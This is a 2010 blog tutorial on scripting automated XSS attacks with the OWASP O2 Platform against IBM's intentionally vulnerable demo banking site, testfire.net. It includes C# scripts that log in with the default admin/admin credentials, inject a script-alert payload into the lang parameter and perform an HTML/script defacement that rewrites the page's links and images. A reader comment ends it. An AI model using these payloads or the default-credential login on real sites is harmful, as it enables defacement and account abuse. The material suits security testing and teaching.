The power of 02 scripting
Dinis Cruz is the creator of 02. He was kind enough to give me a lesson on 02 Internet Explorer Automated Scripting. This is a really powerful tool and will be what I think in the future end deliverable of software security testers to there clients’. This tool actually recreates the vulnerability step by step in an automated fashion.
Let’s get started in creating your automated XSS script for IBM’s demo test fire application. In a previous post we showed the vulnerable lang variable to XSS and we manually exploited it with both IBM app scan as well as 02’s XSS creator.
First you are going to need to install 02. 02 is free and open source and is also an OWASP project.
Once you download the tool you are going to need to sync up the scripts.
Click on Custom 02 scripts.
Dinis created an 02 script for my engagement and my business Parsons Software Security Consulting, LLC. We will drag and drop the Matt parsons v0.1 (Custom 02.h2 script to the logo.
This is the user interface to 02.
We are going to want to double click on IE Automation. Dinis told me that this part of 02 received a lot of traction at OWASP Brazil and that they were really excited about it.
Below are the default scripts.
The default page is http://www.google.com.
Below is the sample script.
var ie = panel.<strong>add_IE</strong>().<strong>silent</strong>(<strong>true</strong>); ie.<strong>open</strong>("http://www.google.com"); //O2File:WatiN_IE_ExtensionMethods.cs //using O2.XRules.Database.Utils.O2 //O2Ref:WatiN.Core.1x.dll
Its basically scripted in C#.
Here is the first script Dinis created.
var ie = panel.add_IE().silent(true); ie.open("<a href="http://demo.testfire.net/">http://demo.testfire.net</a>"); if (ie.hasLink("Sign In")) { ie.link("Sign In").click(); ie.field("uid").value("admin"); ie.field("passw").value("admin"); ie.button("Login").click(); } else ie.link("MY ACCOUNT").click(); return ie.fields(); ]
This script opens the IBM demo web site and logs you in as an admin. One of the users in the IBM test website is admin.
This welcomes you as an admin user.
Next we are going to launch a XSS attack on the lang variable that we found vulnerable in our web site scanner.
ie.open("<a href="http://demo.testfire.net/">http://demo.testfire.net</a>"); if (ie.hasLink("Sign In")) { ie.link("Sign In").click(); ie.field("uid").value("admin"); ie.field("passw").value("admin"); ie.button("Login").click(); } else ie.link("MY ACCOUNT").click(); ie.link("Customize Site Language").click(); ie.link("International").click(); var currentUrl = ie.url(); var xssPayload = "aaa><script> alert('xss')</script>"; ie.open(currentUrl + xssPayload); return currentUrl;]
See the alert XSS.
Now with this script we are going to do some serious XSS defacement.
panel.clear(); var ie = panel.add_IE().silent(true); ie.open("<a href="http://demo.testfire.net/bank/customize.aspx?lang=international">http://demo.testfire.net/bank/customize.aspx?lang</a><a href="http://demo.testfire.net/bank/customize.aspx?lang=international">=international</a>"); var target = ie.elements("P").str("Curent Language: international "); target.flash(); target.injectHtml("beforeBegin","<h1>O2 Platform Demos</h1>"+ "The best way to learn about the security vulnerabilities of this website is to use the <a href<a href="http://primarypad.com/ep/search?query=%5C">=\</a>"<a href="http://o2platform%5c/">http://o2platform\</a>">OWASP O2 Platform</a>"+ "<script DEFER> "+ " //alert(document.links[0].href);"+ " document.links[0].href = \"<a href="http://o2platform.com%5c/">http://o2platform.com\</a>";"+ " document.images[0].src <a href="http://primarypad.com/ep/search?query=%5C">=\</a>"<a href="http://o2platform.com/images/a/">http://o2platform.com/images/a/</a>"+"a0/6_22_2010_7_08_23_PM_tmp9E4.jpg\";"+ " //alert(document.images[0].sec);"+ " //document.images[1].href = "+ " //alert(document.images[1].href);"+ "</script>"); //O2File:WatiN_IE_ExtensionMethods.cs //using O2.XRules.Database.Utils.O2 //O2Ref:WatiN.Core.1x.dll]
Now remember that all of this is automated. It goes through each of the steps to create the defacement.
If you have any questions e-mail me at mparsons1980@gmail.com
I couldn’t reproduce this payload here, I think it’s because the quotes inside the href so I simplified to:
target.injectHtml(“beforeBegin”,”O2 Platform Demos”
“The best way to learn about the security vulnerabilities of this website is to use the ”
“OWASP O2 Platform“);
Thiago
December 2, 2010 at 2:36 pm